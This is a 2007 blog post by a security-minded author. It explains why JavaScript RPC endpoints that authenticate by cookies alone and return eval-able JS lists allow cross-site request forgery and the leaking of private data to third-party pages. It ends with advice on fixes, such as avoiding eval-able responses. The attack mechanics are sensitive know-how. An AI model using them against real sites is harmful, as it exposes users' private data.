Wednesday, July 18, 2007

Why Javascript Remote Procedure Calls beget more Cross Site Request Forgeries

This is going to be a long blog post. I've tried to cut it down, but I've been thinking a lot about this topic for over a year and it's hard to walk all the way through this vulnerability without explaining a lot.

A few days ago I posted a small rant about how there were no "web 2.0 vulnerabilities" that did not also affect older websites. While that's true, the increasing popularity of sites using various javascript RPC methods is definitely leading to a rise in XSRF vulnerabilities, and I wanted to write something on my thoughts on why that is.

I'm not going to talk about vanilla-HTTP-form-post-with-no-secret-token cross site request forgery here. That vulnerability has been about unchanged for a long time, and I'm going to pretty much ignore it- I don't have anything new to say on it at the moment.

In 1995, when I first had web access, websites were pretty basic in comparison to what we have now. To run, say, a search engine, you'd have a handler on a webserver that took user input and wrote out response HTML. It might branch off a new process to do a search, depending on the software, and then it would collect the responses and return them via HTTP to the browser.

Very shortly webpages started getting a little bit more complex. When these first dynamic web pages were made it was very difficult to decouple "backend" software from the pages that it generated. There might be a database behind the web site, and maybe that was on a different server. Most likely, though, the code that wrote to the database was wrapped up in the same binary that generated the HTML for the webpages and processed the inputs and all that was just on one webserver. Everything would be in, perhaps, 1 perl file and a few perl modules.

RPCs, Services, and tiers

So then, "services" started to appear. And front end code, that printed out HTML, was often split out into new binaries, and CSS arrived. So we got some decoupling of "code that writes HTML" from "code that inserts data into the DB" in larger websites. Soon, "code that inserts data into the DB" was moved off to another server entirely. It was the start of "multi tiered" websites.

This is a great way to build complicated websites, and there's so much written about multi tier website architecture that I'm not going to explain it here. We'll just note that the middle tier servers that, perhaps, performed various actions and returned data to the web front ends probably had a bunch of protections in place limiting who could talk to them and involving swanky authentication. And this was generally over internal network connections, entirely within a particular data center. More service layers might be written, caches added and so forth, but the general architecture was the same. So let's say that a site wants to display to a user "here are the groups you belong to".

Probably this was what happened:
1. the user clicks to a URL like "example.com/showmemygroups.cgi", and the browser sends her login cookie with the request
2. the webserver gets the request and determines it's user "annika" from the cookies
3. the webserver software assembles a request object for the groups that user "annika" belongs to and makes a request to a middle tier server over some networking protocol (over an internal network connection, remember)
4. the middle tier server works magic and assembles an object that holds annika's groups, then dispatches the result to the web server software
5. the web server parses the groups object and builds a HTML page to display the data. that is returned to the user's browser via HTTP

Web 2.0
In recent years, a lot of sites have realized that you can make RPC calls in javascript. (RPC = Remote Procedure Call. Again, there's a lot written on this on the web so I won't explain it much here) This is pretty cool, website applications no longer are bound by "click, load a page, click, load a page" and can now behave more like desktop applications. I think that this is a good thing in general. Again, many other people have written wonderful things about the rise of web services and Ajax and mashups and "the programmable web."

But now in the programmable web world, developers don't want to have to make the user go to a new page to see, perhaps, that they joined a cool group on a social networking site. They want to be able to show the user "here are your groups" on the page that they are on right now.

The browser rendering the webpage makes a GET or a POST to get the groups data, but it might talk directly to the server that used to be "the middle tier server" sitting alone in a data center and only speaking to the frontend web server. In the new model, it might talk directly to browsers. Or the code that ran on it might now run on our webserver. The data isn't just going over internal network connections, so you can't easily limit what IP addresses can make these RPC calls- it's now the users browser making the RPC call, from the user's IP address. The data that it returns is in a nice, portable format generally, like a javascript list.
Remember those steps above? Here's what they are now:

1. the user performs an action that triggers a "getGroups" function in the "myutilities.js" file (that the page we're on included)which perhaps triggers a getXMLHttpRequest (or similiar) call to the webserver. Then the browser sends her login cookies along with the javascript-triggered HTTP request.

2. the request goes not to the webserver software that wrote the HTML but maybe gets forwarded right to the middle tier (potentially via some URL rewriting on the server side or a some other methods)

3. the middle tier server inspects the cookies it was given, sees that they belong to "annika" and works magic and assembles an object that holds annika's groups, wraps it into a javascript list object, then dispatches the result to the browser

4. the browser takes the returned JS and writes it to the page that annika is viewing

So what just happened? For one, we changed who can make the RPC calls and who can access the data returned by it. And we changed the format of the request and the format of the response.

Notice how we lean only on cookies for authentication now. This is where I tend to lose people- there are still all those "determine user" steps in there, so it might look more secure. It's not.

An Explanation of what's broken
What happens in that scenario is that calls like <script src="http://othersite.com/myutilities.js"> - what we made above- can be placed on www.example.com -and then calls to its getGroups function will work. And the site is sending back data in a format that can be used on any third party website making the RPC call.

If we have a call to othersite.com's getGroups fuction on example.com, the user's browser will send the othersite.com cookies along with the getGroups function... even though the function was called from a page that comes from example.com. That just jumped us out of the usual javascript Same Domain sandboxing. The groups will come back in a javascript list and be readable by the javascript on example.com - we used the user's othersite.com credentials to request data that we want which we wouldn't be able to request on our own. I could maybe see MY othersite.com groups, but without this technique, I can't see Annika's groups short of stealing her password.

Where most of the security vulnerabilities arise that I've seen is that people don't stop to think about disclosing private data. I've seen a few account change actions disclosed this way, but not as many.

What's mostly happened is that there's been a wrapper put around some old backend libraries to expose them via javascript, and then those have been used on the site. Let me point out something here- even if we did not remove the "talk to web server, web server talks to middle tier server, middle tier server returns an object" steps, this would still be insecure. The fact that we can call this code from any third party site but have the orginal site's cookies get sent is what's insecure. And the format that the data comes back in allows it to be potentially read by the third party site.

Another clarification here- for private data disclosure bugs, we need to have the return data from othersite.com in a format that the rendering webpage on example.com can read. For account information changing bugs- where hitting a URL will, for example, mark that "I give this group 4 stars!", the return data does NOT need to be readable by the page on example.com.

Fixing this
Can this be fixed? Yes, absolutely. It's just that I've seen a lot of naive implementations of frameworks of this sort. And a lot of people try to fix this and fail.

What is a bad fix? Checking referral headers. There was a way to use flash to break that, and it was fixed (but who knows how many users upgraded their flash to the fixed version). And now there's a new way to do it again... I wouldn't rely on that staying fixed. Using POST only isn't going to cut it either.

What is a good fix? Make sure that you don't return a JS list or other eval-able JS code in step #4 above. Boobytrapping is good. I linked a few days ago to a site which shows good and bad ways to return data from RPCs, but here it is again:
http://jpsykes.com/47/practical-csrf-and-json-security

This post is really a work in progress because I'm still trying to figure out how to explain all this in a way that's clear. Criticism and feedback welcomed, my email is on my domain's homepage.

No comments: